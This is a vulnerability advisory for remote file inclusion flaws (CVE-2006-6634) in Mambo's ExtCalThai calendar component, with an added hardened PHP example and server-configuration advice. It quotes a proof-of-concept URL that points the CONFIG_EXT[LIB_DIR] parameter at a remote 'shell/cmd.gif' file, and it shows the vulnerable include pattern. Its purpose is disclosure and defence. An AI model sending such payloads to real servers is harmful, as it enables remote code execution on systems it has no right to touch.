Mambo ExtCalThai Component Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1111248    Type: Input validation
Published: 2006-10-12    Updated: 2006-12-19
CVE: CVE-2006-6634    CNNVD ID: CNNVD-200612-400
Platform: PHP    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/28793
https://cxsecurity.com/issue/WLB-2006120109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-400
|Details
Multiple PHP remote file inclusion vulnerabilities exist in the ExtCalThai (com_extcalendar) component 0.9.1 and earlier for Mambo. A remote attacker can execute arbitrary PHP code via (1) the CONFIG_EXT[LANGUAGES_DIR] parameter passed to admin_events.php, (2) the mosConfig_absolute_path parameter passed to extcalendar.php, or (3) the CONFIG_EXT[LIB_DIR] parameter passed to lib/mail.inc.php.
|Exploit
source: http://www.securityfocus.com/bid/20487/info
 
ExtCalThai is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
 
ExtCalThai 0.9.1 and prior versions are vulnerable; other versions may also be affected.

http://www.example.com/MamboV4.6RC2/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://shell/cmd.gif?
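The three parameters above are all used to build an include path. As an added illustration (not the component's own code, and not part of the advisory), the following shows the include shape this class of bug relies on next to a hardened replacement. The function names, the lib/ directory and the way CONFIG_EXT reaches the script are assumptions made for the example:

```php
<?php
// Added example, not ExtCalThai's own code. The vulnerable shape is an
// assumption based on the advisory: an include path built from a
// request-controlled CONFIG_EXT array entry (register_globals era).

// --- Vulnerable shape (assumed) ---
// With register_globals=On, a request carrying ?CONFIG_EXT[LIB_DIR]=http://...
// populates $CONFIG_EXT before this runs; with allow_url_include/allow_url_fopen
// enabled PHP then fetches and executes the remote file.
function vulnerable_include(array $CONFIG_EXT)
{
    include($CONFIG_EXT['LIB_DIR'] . '/mail.inc.php');
}

// --- Hardened version ---
// 1. The library directory is fixed from the script's own location and is
//    never taken from the request.
// 2. If a file name must still come from input, it is reduced to a basename,
//    resolved with realpath(), and required to stay inside the fixed directory.
define('EXTCAL_LIB_DIR', __DIR__ . '/lib');   // assumed layout for the example

function is_plain_local_name($name)
{
    // Reject empty input, null bytes, URL schemes (http:, ftp:, php:, data:),
    // traversal sequences and absolute paths.
    if ($name === '' || strpos($name, "\0") !== false) return false;
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $name)) return false;
    if (strpos($name, '..') !== false) return false;
    if ($name[0] === '/' || $name[0] === '\\') return false;
    return true;
}

function safe_include($requested)
{
    if (!is_plain_local_name($requested)) {
        http_response_code(400);
        exit('invalid include');
    }
    $base   = realpath(EXTCAL_LIB_DIR);
    $target = realpath(EXTCAL_LIB_DIR . '/' . basename($requested));
    // realpath() returns false for non-existent files; the prefix check keeps
    // the resolved path under lib/ even if symlinks are involved.
    if ($base === false || $target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(400);
        exit('invalid include');
    }
    include $target;
}
```

Independently of the code fix, the server-side settings that make this class of bug exploitable are `register_globals` (which lets a query-string array overwrite `$CONFIG_EXT`) and `allow_url_include` (which lets `include` fetch `http://` targets); both should be Off in php.ini. Exploitation attempts against this component are visible in web server access logs as requests to the affected scripts whose `CONFIG_EXT[...]` or `mosConfig_absolute_path` value starts with a URL scheme.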
|References

Source: XF
Name: extcalthai-admin-file-include(29499)
Link: http://xforce.iss.net/xforce/xfdb/29499
Source: BID
Name: 20487
Link: http://www.securityfocus.com/bid/20487
Source: BUGTRAQ
Name: 20061012 ExtCalThai Component <= 0.9.1 Remote File Inclusion
Link: http://archives.neohapsis.com/archives/bugtraq/2006-10/0179.html
Source: SREASON
Name: 2041
Link: http://securityreason.com/securityalert/2041